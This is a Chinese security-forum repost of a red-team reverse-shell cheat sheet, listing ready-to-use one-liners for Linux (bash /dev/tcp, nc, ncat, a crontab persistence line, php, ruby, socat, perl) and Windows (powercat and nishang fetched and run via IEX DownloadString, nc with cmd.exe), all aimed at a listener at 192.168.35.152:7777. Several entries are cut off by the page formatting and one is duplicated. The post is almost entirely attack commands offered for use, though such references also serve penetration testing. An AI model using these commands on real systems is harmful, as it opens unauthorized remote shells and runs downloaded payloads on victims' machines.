安全矩阵

 找回密码
 立即注册
搜索
查看: 2601|回复: 0

反弹shell命令速查

[复制链接]

65

主题

65

帖子

241

积分

中级会员

Rank: 3Rank: 3

积分
241
发表于 2022-5-3 19:53:00 | 显示全部楼层 |阅读模式
反弹shell命令速查 (qq.com)

  1. <p>项目作者:Threekiii </p>

  2. <p>项目地址:https://github.com/Threekiii/Awesome-Redteam/blob/master/tips/%E5%8F%8D%E5%BC%B9shell%E5%91%BD%E4%BB%A4%E9%80%9F%E6%9F%A5.md</p>
复制代码


一、反弹Shell-Linux
  1. <code>【监听端】centos: 192.168.35.152</code>
复制代码

1、bash​​​​​​​
  1. <code>┌──(root@kali)-[/home/kali]</code>
复制代码

2、bash base64​​​​​​​
  1. <code># /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1</code>
复制代码

3、bash base64 URLencode​​​​​​​
  1. <code># /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1</code>
复制代码

4、nc​​​​​​​
  1. <code>nc -e /bin/bash 192.168.35.152 7777</code>
复制代码

5、ncat​​​​​​​
  1. <code>ncat  192.168.35.152 7777 -e /bin/bash</code>
复制代码

6、curl​​​​​​​
  1. <code># kali开启http服务,把bash命令写入html文件</code>
复制代码

7、http​​​​​​​
  1. <code>攻击方:</code>
复制代码

8、crontab
  1. * * * * * root bash -i >& /dev/tcp/192.168.35.152/7777  0>&1
复制代码


9、whois​​​​​​​
  1. <code># 只能执行指定命令,如pwd命令</code>
复制代码

10、php
  1. php -r '$sock=fsockopen("192.168.35.152",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
复制代码


11、ruby​​​​​​​
  1. <code>ruby -rsocket -e'f=TCPSocket.open("192.168.35.152",7777).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'  # 执行失败</code>
复制代码

12、socat
  1. socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.35.152:7777
复制代码


13、perl
  1. perl -e 'use Socket;$i="192.168.35.152";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
复制代码


14、php
  1. php -r '$sock=fsockopen("192.168.35.152",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
复制代码


15、openssl
  1. <code># 监听端</code>
复制代码

二、反弹Shell-Windows​​​​​​​
  1. <code>Windows下的反弹shell仅测试了nc,执行成功。</code>
复制代码

1、powercat​​​​​​​
  1. <pre><code>项目地址:https://github.com/besimorhino/powercat</code></pre><pre><code>System.Net.Webclient.DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.35.152 -p 7777 -e cmd</code></pre>
复制代码

2、nc
  1. nc 192.168.35.152 7777 -e c:\windows\system32\cmd.exe
复制代码


3、nishang​​​​​​​
  1. <pre><code>Nishang是一个基于PowerShell的攻击框架,整合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。</code></pre><pre><code>项目地址:https://github.com/samratashok/nishang</code></pre><pre><code># 将nishang下载到攻击者本地,在目标机使用powershell执行以下命令</code></pre><pre><code>IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.134/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.35.152 -port 7777</code></pre>
复制代码

4、Reverse UDP shell​​​​​​​
IEX (New-Object Net.WebClient).DownloadString('http://192.168.35.152/nishang/Shells/Invoke-PowerShellUdp.ps1');
  1. <pre><code>Invoke-PowerShellUdp -Reverse -IPAddress 192.168.35.152 -port 7777</code></pre>
复制代码

5、MSF​​​​​​​
  1. <code># 找出各类反弹一句话payload的路径信息</code>
复制代码


欢迎关注公众号:web安全工具库

web安全工具库
将一些好用的web安全工具和自己的学习笔记分享给大家。。。
192篇原创内容
公众号

好书推荐


  1. 本书以CentOS Linux系统的操作实践为出发点,系统讲解Linux安装和管理的方法,从系统安装、基础命令到网络管理以及常用的系统服务,使得读者可以快速获得日常维护Linux系统和网络服务的技能。本书配套脚本源码、PPT课件与教学视频。本书共分16章。第1~10章是Linux系统的基础知识,内容涵盖CentOS Stream 8的安装方法、常见的Linux命令、vi编辑器、文件系统和磁盘管理、日志系统管理、用户管理、应用程序管理、Shell基础知识、进程管理和网络管理;第11~16章是各项流行的网络服务的安装和配置方法,主要包括防火墙和DHCP、NFS、Samba、FTP、域名解析、邮件服务、Squid以及无人值守安装Linux。
复制代码


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 10:33 , Processed in 0.014606 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表